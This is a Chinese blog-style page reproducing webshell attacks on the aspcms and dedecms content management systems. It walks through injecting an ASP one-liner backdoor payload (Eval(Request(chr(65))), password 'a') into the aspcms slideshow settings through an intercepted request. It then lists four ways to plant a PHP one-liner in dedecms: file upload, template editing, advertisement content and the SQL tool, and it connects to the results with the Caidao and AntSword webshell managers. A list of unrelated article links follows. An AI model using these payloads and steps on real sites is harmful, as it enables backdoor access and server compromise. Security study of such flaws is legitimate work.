当前位置: 首页 > news >正文

dedecms(四种webshell姿势)、aspcms webshell漏洞复现

news 2025/7/24 13:21:53

一、aspcms webshell

1、登陆后台,在扩展功能的幻灯片设置模块,点击保存进行抓包查看

 2、在slideTextStatus写入asp一句话木马 

1%25><%25Eval(Request(chr(65)))%25><%25 密码是a,放行,修改成功

 

3、使用菜刀工具连接查看

 

二、dedecms  webshell

1、在附件管理上传文件可以上传一句话木马php文件

2、在模板管理的index.php文件中写入phpinfo()查看

 

3、在广告管理,添加广告内容出添加一句话木马,使用蚁剑连接查看

 

4、系统中SQL命令执行工具中可以执行写入一句话木马文件

http://www.lryc.cn/news/441491.html

相关文章:

  • 【STM32系统】基于STM32设计的智能垃圾桶(语音、颜色识别、称重、光强、烟雾、人体识别、步进电机、水泵)——文末资料下载
  • GPT代码记录
  • powerbi
  • 【Unity】检测鼠标点击位置是否有2D对象
  • Python学习——【2.1】if语句相关语法
  • 机器学习--K-Means
  • 模型训练时CPU和GPU大幅度波动——可能是数据的读入拖后腿
  • keep-alive的应用场景
  • 【C++ Primer Plus习题】16.9
  • Java入门:09.Java中三大特性(封装、继承、多态)02
  • AI为云游戏带来的革新及解决方案:深度技术剖析与未来展望
  • 集合是什么
  • JavaDS —— 图
  • 魅思-视频管理系统 getOrderStatus SQL注入漏洞复现
  • SOME/IP通信协议在汽车业务具体示例
  • jupyter notebook添加环境/添加内核
  • 建模杂谈系列256 规则函数化改造
  • python实现冒泡排序的算法
  • 爱玩游戏的弟弟,被人投资了100万
  • Pandas_数据结构详解
  • Leetcode 3287. Find the Maximum Sequence Value of Array
  • python 山峦图
  • Open3D:3D数据处理与可视化的强大工具
  • YOLOv8改进系列,YOLOv8的Neck替换成AFPN(CVPR 2023)
  • BitLocker硬盘加密的详细教程分享
  • YOLOv8的GPU环境搭建方法
  • JZ2440下载后设置NAND启动文件系统
  • AI绘画与摄影新纪元:ChatGPT+Midjourney+文心一格 共绘梦幻世界
  • 金手指设计
  • Chainlit集成LlamaIndex并使用通义千问模型实现AI知识库检索网页对话应用增强版